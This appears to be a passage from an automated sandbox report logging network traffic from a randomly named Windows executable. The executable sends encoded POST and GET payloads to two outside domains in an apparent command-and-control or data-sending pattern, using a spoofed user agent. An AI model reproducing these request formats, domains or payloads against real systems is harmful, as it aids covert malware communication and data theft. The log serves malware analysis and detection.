                      Aug 23, 2024 08:28:10.028191090 CEST1236INData Raw: 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 69 6e 73 69 64 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 73 69 64 65 2d 77 72 61 70 70 65 72 29 20 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f
                      Data Ascii: e(.wp-block-search__button-inside .wp-block-search__inside-wrapper) :where(.wp-block-search__button){padding:4px 8px}.wp-block-search.aligncenter .wp-block-search__inside-wrapper{margin:auto}.wp-block[data-align=right] .wp-block-search.wp-bloc


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      35192.168.2.649757162.55.254.209806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:28:11.855149984 CEST1803OUTPOST /qpwk/ HTTP/1.1
                      Host: www.anaidittrich.com
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.anaidittrich.com
                      Referer: http://www.anaidittrich.com/qpwk/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 43 6c 55 75 47 44 75 77 54 30 33 36 78 45 75 47 4c 73 73 42 4d 62 67 5a 76 72 53 34 57 4f 2b 46 54 66 35 34 52 48 36 53 6f 69 35 6f 66 49 64 2b 50 56 50 6e 67 39 5a 55 4e 71 48 64 4a 6c 76 70 38 6b 39 53 6f 37 71 78 7a 79 31 46 43 72 53 6e 31 55 2f 4c 6e 75 6c 78 44 49 38 2b 4b 71 31 37 49 64 51 47 2b 43 55 6b 36 76 58 71 4d 43 42 6b 4b 75 42 30 2f 4d 57 4e 4a 31 4f 68 71 45 47 4d 76 74 6c 63 46 47 66 61 6f 76 45 30 53 4d 56 53 62 31 6b 37 33 4c 6b 50 37 32 65 36 33 70 49 4a 6c 45 61 6d 63 38 36 4b 72 73 70 78 62 59 6a 4b 32 55 63 2b 48 46 32 72 61 62 69 71 42 4f 4c 47 30 37 69 62 4f 57 2f 41 52 45 41 6b 47 4e 75 62 44 4c 6c 78 7a 51 68 65 69 2b 75 37 65 72 79 31 57 6d 6b 43 59 41 45 6d 68 4b 59 30 5a 32 4a 2f 66 6d 44 32 69 73 75 5a 31 54 62 2f 33 4b 6e 63 6f 4a 32 79 4b 78 62 70 74 4d 45 6f 51 61 33 56 72 7a 78 56 7a 48 63 38 71 50 52 61 6b 54 34 67 39 6b 36 4f 36 4c 4f 43 58 57 42 57 4d 43 50 56 74 2b 69 62 45 49 78 55 6d 36 4e 63 4a 30 31 7a 49 48 68 6e 69 56 34 43 2b 6f 64 5a [TRUNCATED]
                      Data Ascii: Xn70_=ClUuGDuwT036xEuGLssBMbgZvrS4WO+FTf54RH6Soi5ofId+PVPng9ZUNqHdJlvp8k9So7qxzy1FCrSn1U/LnulxDI8+Kq17IdQG+CUk6vXqMCBkKuB0/MWNJ1OhqEGMvtlcFGfaovE0SMVSb1k73LkP72e63pIJlEamc86KrspxbYjK2Uc+HF2rabiqBOLG07ibOW/AREAkGNubDLlxzQhei+u7ery1WmkCYAEmhKY0Z2J/fmD2isuZ1Tb/3KncoJ2yKxbptMEoQa3VrzxVzHc8qPRakT4g9k6O6LOCXWBWMCPVt+ibEIxUm6NcJ01zIHhniV4C+odZ7pbXQd2iNTgPF74sXCDQ4MRI96+bp78owfbTlH+v6uebnQbKMSYPogGB6tpYXT3TgS/y6NSwhFU3qtGlRxjJSkq13i7ldfbhaQx2SvGVFZr4+Re1B01yxt+BohY/s8ZpKN4ntGXPkucTcIE1hWuksCI+1S+ZsL2TFJd1B/8G4FUgOtxY1jbU4xOBrTKa+I5lmhqf3xuq4fGi66axYFgROpnDFpYwyIHFTpFS24F8BxOAfM22K0mW9GCBPYSoG2KYhHHz1B4FC4Zwe073htbI7ZrHTrhG2PL5OCNFQ2xXqO+xBw2LVxI4iVOObao47yeLDLXsXRKJ5b67Vt1xuhW/bpDv3LA3KRB4j1r1gwTz4MFoQ29BrPEggdAWtkCJcfFApw8pa/mEc2Uk+5btPLm6R+vtdxm2Ob3j09RgJFE3rvLRJM6rrKRncJ67LR1pbJwBCI5oCwPJeMS3Z54Ud4PXNMGXoz6cpo0A+cJWi5rz2fRN6r3IyiMT301f/XhxfDLl6OCKqEODyHyTdFIbaiUcB2z7GzSnsIo4jUj2LXs2a5Nxjl1XVAyJjpAH3Eo0IffiwwxeG5+zzYopDljmtzcn+7x8ghPdLL52feM5cBuKBSxwp4YeU01sLG7Ok2icclG7rqgkwXUwe2Z8dtkst+Rr/+CmaAKv8dCDem [TRUNCATED]
                      Aug 23, 2024 08:28:12.637598991 CEST1236INHTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:28:12 GMT
                      Server: Apache
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"
                      Upgrade: h2c
                      Connection: Upgrade, close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 [TRUNCATED]
                      Data Ascii: 11353<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="de_DE" /><meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich Art, Design, Care" /><meta property="og:site_name" content="Anai Dittrich Art, Design, Care" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target":{"@
                      Aug 23, 2024 08:28:12.637609959 CEST1236INData Raw: 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22
                      Data Ascii: type":"EntryPoint","urlTemplate":"http://anaidittrich.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"}]}</script>... / Yoast SEO plugin. --><title>Seite wurde nicht gefunden. - Anai D
                      Aug 23, 2024 08:28:12.637622118 CEST1236INData Raw: 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c
                      Data Ascii: 32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return
                      Aug 23, 2024 08:28:12.637649059 CEST1236INData Raw: 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43
                      Data Ascii: ing:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.t
                      Aug 23, 2024 08:28:12.637661934 CEST1236INData Raw: 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a
                      Data Ascii: rything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><style id='wp-block-site-logo-inline-css'>.wp-block-site-lo
                      Aug 23, 2024 08:28:12.637665033 CEST1236INData Raw: 72 74 65 72 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 38 70 78 7d 2e 6c 69 6e 6b 2d 75 69 2d 62 6c 6f 63 6b 2d 69 6e 73 65 72 74 65 72 5f 5f 62 61 63 6b 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a
                      Data Ascii: rter{padding-top:8px}.link-ui-block-inserter__back{margin-left:8px;text-transform:uppercase}.is-style-arrow-link .wp-block-navigation-item__label:after {content: "\2197";padding-inline-start: 0.25rem;vertical-align: mid
                      Aug 23, 2024 08:28:12.637669086 CEST1236INData Raw: 6c 69 67 6e 2d 6c 65 66 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 6c 72 5d 29 2c 68 35 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74
                      Data Ascii: lign-left[style*=writing-mode]:where([style*=vertical-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-
                      Aug 23, 2024 08:28:12.637753010 CEST1236INData Raw: 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 70 61 72 61 67 72 61 70 68 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 69 73 2d 73 6d 61 6c 6c 2d
                      Data Ascii: -right: auto;}</style><style id='wp-block-paragraph-inline-css'>.is-small-text{font-size:.875em}.is-regular-text{font-size:1em}.is-large-text{font-size:2.25em}.is-larger-text{font-size:3em}.has-drop-cap:not(:focus):first-letter{float:l
                      Aug 23, 2024 08:28:12.637758017 CEST1236INData Raw: 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 34 39 34 39 34 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 3b
                      Data Ascii: appearance:none;border:1px solid #949494;flex-grow:1;margin-left:0;margin-right:0;min-width:3rem;padding:8px;text-decoration:unset!important}.wp-block-search.wp-block-search__button-only .wp-block-search__button{flex-shrink:0;margin-left:0;max
                      Aug 23, 2024 08:28:12.637769938 CEST1236INData Raw: 63 69 6e 67 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 69 6e 68 65 72 69 74 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62
                      Data Ascii: cing:inherit;line-height:inherit;text-transform:inherit}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){border:1px solid #949494;box-sizing:border-box;padding:4px}:where(.wp-block-search__button-inside .wp-block-search
                      Aug 23, 2024 08:28:12.642724991 CEST1236INData Raw: 74 28 2e 69 73 2d 6e 6f 74 2d 73 74 61 63 6b 65 64 2d 6f 6e 2d 6d 6f 62 69 6c 65 29 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 7b 66 6c 65 78 2d 62 61 73 69 73 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 40 6d 65 64 69 61 20 28 6d
                      Data Ascii: t(.is-not-stacked-on-mobile)>.wp-block-column{flex-basis:100%!important}}@media (min-width:782px){.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{flex-basis:0;flex-grow:1}.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-b


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      36192.168.2.649758162.55.254.209806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:28:14.401947021 CEST507OUTGET /qpwk/?mV=ZpN4DLSXOzy8qX&Xn70_=Pn8OF1j/flre3VeYQ8gIXKcN0tGdbcqXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/Dp7mYeP8BtJLpf3hF/3m/h5NM1/Dot3Sot4/3V0qZLtTBV8KMhP3aG6aVWI0GSP3d0EJgo= HTTP/1.1
                      Host: www.anaidittrich.com
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:28:15.077173948 CEST509INHTTP/1.1 301 Moved Permanently
                      Date: Fri, 23 Aug 2024 06:28:14 GMT
                      Server: Apache
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      X-Redirect-By: WordPress
                      Upgrade: h2c
                      Connection: Upgrade, close
                      Location: http://anaidittrich.com/qpwk/?mV=ZpN4DLSXOzy8qX&Xn70_=Pn8OF1j/flre3VeYQ8gIXKcN0tGdbcqXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/Dp7mYeP8BtJLpf3hF/3m/h5NM1/Dot3Sot4/3V0qZLtTBV8KMhP3aG6aVWI0GSP3d0EJgo=
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      37192.168.2.64975964.64.237.133806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:28:20.587084055 CEST757OUTPOST /0or4/ HTTP/1.1
                      Host: www.551108k5.shop
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.551108k5.shop
                      Referer: http://www.551108k5.shop/0or4/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 4e 72 56 33 57 58 75 6d 4b 45 59 72 49 62 75 6d 6c 6c 56 63 55 71 48 43 79 72 2b 45 5a 79 66 30 72 70 73 38 68 52 5a 35 71 5a 53 76 52 30 6d 34 42 4a 35 73 59 36 54 73 63 53 67 6e 4a 4b 68 65 50 59 56 70 5a 61 62 50 36 6b 4b 74 71 64 2f 4a 64 50 54 47 4d 78 6c 4f 52 75 57 53 6f 6b 73 68 62 67 41 70 63 4a 61 4e 2b 75 54 58 73 54 73 72 48 73 39 47 7a 38 56 4b 37 72 34 51 44 62 45 56 39 69 56 75 47 2f 36 69 77 45 53 74 46 66 4a 67 50 56 37 70 48 41 43 65 6f 70 68 77 54 5a 6f 68 65 43 44 61 4d 47 55 7a 48 53 73 46 61 65 79 61 4a 76 37 50 45 64 6c 55 36 7a 58 4a 6e 6e 38 39 79 57 30 43 72 78 4c 39 31 4c 7a 2f
                      Data Ascii: Xn70_=NrV3WXumKEYrIbumllVcUqHCyr+EZyf0rps8hRZ5qZSvR0m4BJ5sY6TscSgnJKhePYVpZabP6kKtqd/JdPTGMxlORuWSokshbgApcJaN+uTXsTsrHs9Gz8VK7r4QDbEV9iVuG/6iwEStFfJgPV7pHACeophwTZoheCDaMGUzHSsFaeyaJv7PEdlU6zXJnn89yW0CrxL91Lz/
                      Aug 23, 2024 08:28:21.147763968 CEST401INHTTP/1.1 301 Moved Permanently
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:28:21 GMT
                      Content-Type: text/html
                      Content-Length: 162
                      Connection: close
                      Location: https://www.551108k5.shop/0or4/
                      Strict-Transport-Security: max-age=31536000
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      38192.168.2.64976064.64.237.133806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:28:23.149094105 CEST781OUTPOST /0or4/ HTTP/1.1
                      Host: www.551108k5.shop
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.551108k5.shop
                      Referer: http://www.551108k5.shop/0or4/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 4e 72 56 33 57 58 75 6d 4b 45 59 72 4a 37 65 6d 6e 47 4e 63 54 4b 48 64 33 72 2b 45 51 53 66 77 72 6f 51 38 68 51 74 50 71 4c 32 76 52 57 2b 34 41 4b 68 73 66 36 54 73 4a 69 67 6f 55 61 68 52 50 59 59 63 5a 62 6e 50 36 67 69 74 71 66 6e 4a 63 34 48 48 4d 68 6c 32 49 2b 57 63 31 30 73 68 62 67 41 70 63 49 71 6a 2b 75 37 58 74 69 63 72 47 49 70 4a 36 63 56 4e 73 62 34 51 53 4c 46 63 39 69 56 4d 47 2b 6e 46 77 47 71 74 46 64 42 67 50 68 6e 71 65 77 43 63 6c 4a 67 63 64 4d 56 31 52 43 57 59 49 6c 77 70 63 67 34 59 57 49 7a 41 56 63 37 73 57 4e 46 57 36 78 50 37 6e 48 38 58 77 57 4d 43 35 6d 48 61 36 2f 57 63 5a 2f 4a 4c 75 53 47 64 64 58 38 57 6b 73 6f 44 49 78 67 42 47 67 3d 3d
                      Data Ascii: Xn70_=NrV3WXumKEYrJ7emnGNcTKHd3r+EQSfwroQ8hQtPqL2vRW+4AKhsf6TsJigoUahRPYYcZbnP6gitqfnJc4HHMhl2I+Wc10shbgApcIqj+u7XticrGIpJ6cVNsb4QSLFc9iVMG+nFwGqtFdBgPhnqewCclJgcdMV1RCWYIlwpcg4YWIzAVc7sWNFW6xP7nH8XwWMC5mHa6/WcZ/JLuSGddX8WksoDIxgBGg==
                      Aug 23, 2024 08:28:23.725356102 CEST401INHTTP/1.1 301 Moved Permanently
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:28:23 GMT
                      Content-Type: text/html
                      Content-Length: 162
                      Connection: close
                      Location: https://www.551108k5.shop/0or4/
                      Strict-Transport-Security: max-age=31536000
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      39192.168.2.64976164.64.237.133806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:28:25.822999001 CEST1794OUTPOST /0or4/ HTTP/1.1
                      Host: www.551108k5.shop
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.551108k5.shop
                      Referer: http://www.551108k5.shop/0or4/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 4e 72 56 33 57 58 75 6d 4b 45 59 72 4a 37 65 6d 6e 47 4e 63 54 4b 48 64 33 72 2b 45 51 53 66 77 72 6f 51 38 68 51 74 50 71 4c 2b 76 52 6c 32 34 42 71 64 73 65 36 54 73 49 69 68 76 55 61 68 32 50 59 41 59 5a 62 72 41 36 6d 6d 74 73 4d 76 4a 62 4e 72 48 66 42 6c 32 48 65 57 52 6f 6b 74 6a 62 6a 70 68 63 4a 57 6a 2b 75 37 58 74 67 45 72 41 63 39 4a 38 63 56 4b 37 72 34 63 44 62 46 30 39 69 38 37 47 2b 6a 2f 78 31 69 74 46 39 52 67 66 45 37 71 58 77 43 53 67 4a 67 45 64 4d 52 44 52 44 36 69 49 6b 55 54 63 67 63 59 53 76 79 44 41 66 37 6c 56 4e 64 5a 72 77 2f 47 6e 58 6b 45 38 47 77 61 34 33 76 63 32 50 6d 4b 63 59 73 55 6f 42 58 63 63 47 6f 44 72 4a 52 73 63 6a 31 55 52 73 7a 6c 64 4c 2b 41 6a 57 65 61 38 4f 38 41 4a 44 77 4f 68 41 70 64 47 6a 51 50 75 59 55 64 41 4f 31 52 77 48 4f 6c 4b 67 4e 44 74 6e 45 47 53 6f 53 45 67 4e 67 4b 63 73 55 57 5a 51 66 43 6e 46 4f 47 45 72 4b 5a 39 68 53 35 57 61 34 53 6c 34 67 64 6e 67 62 34 61 6f 62 30 37 30 61 72 6f 32 6c 41 44 41 39 42 49 4e 75 6f [TRUNCATED]
                      Data Ascii: Xn70_=NrV3WXumKEYrJ7emnGNcTKHd3r+EQSfwroQ8hQtPqL+vRl24Bqdse6TsIihvUah2PYAYZbrA6mmtsMvJbNrHfBl2HeWRoktjbjphcJWj+u7XtgErAc9J8cVK7r4cDbF09i87G+j/x1itF9RgfE7qXwCSgJgEdMRDRD6iIkUTcgcYSvyDAf7lVNdZrw/GnXkE8Gwa43vc2PmKcYsUoBXccGoDrJRscj1URszldL+AjWea8O8AJDwOhApdGjQPuYUdAO1RwHOlKgNDtnEGSoSEgNgKcsUWZQfCnFOGErKZ9hS5Wa4Sl4gdngb4aob070aro2lADA9BINuodi2T5m8E+jH7A3NoTrGks7uhzvWu3ZXEyGiC5V0lakW8y6CTK3xhCARtHq/OeSAp2EuGrpMBa+FgZWPw2nFR7Ksb4UlttmGGSjrGNkNd8Mgds57OuCpNzU9jZ2Vz/H816xSAqYPD0TvBXmuVyOO2WV5RQcpOQTRdaH6VRatXRbthLK9+28+rDeLIB0Rd8lHFNVxU0WVy6+cmc7i+N3TX9UWznWyMWf3i4E4QATShVR4rRMNQBtcjCBYow0rx0gl+wDUNcJrH9jEmhOLWnmpnTyuQtD6Wk6jW3tw1QJQWykJmiotVAxsF2z6jANExVzbqveABSF0Njpo909rdbKZcl5JzptWDK9zuAgedJwFtmyYVGViJ/DxOS8/IiwnCAP9IO8ASZBbduf5xueaUPSiDNJ4a3XCTqcQLdcU19Bu7nuZS16aBvompo0uZZhTlezMFUUKHA85b1SLNnmcfZ9wsL/hnA23O1wq5hGskLIqPwB/GpiX1OExf2YAO5zGHZQOf+qQwAn4CaMlyF4aNOwGXQNFEYbfGeb5gpNWrxvqshUZRVrgm72hh2Xqe4tWQqqbVjrfa2fWFnoqdDbYT2WbpKLVOCzRsC0/XuIL9cAfUmQTJY1LODVAalpA/GXuLzI6wic/njrWshSz4a/urQlBnlmbtYbYg//KZxC [TRUNCATED]
                      Aug 23, 2024 08:28:26.314662933 CEST401INHTTP/1.1 301 Moved Permanently
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:28:26 GMT
                      Content-Type: text/html
                      Content-Length: 162
                      Connection: close
                      Location: https://www.551108k5.shop/0or4/
                      Strict-Transport-Security: max-age=31536000
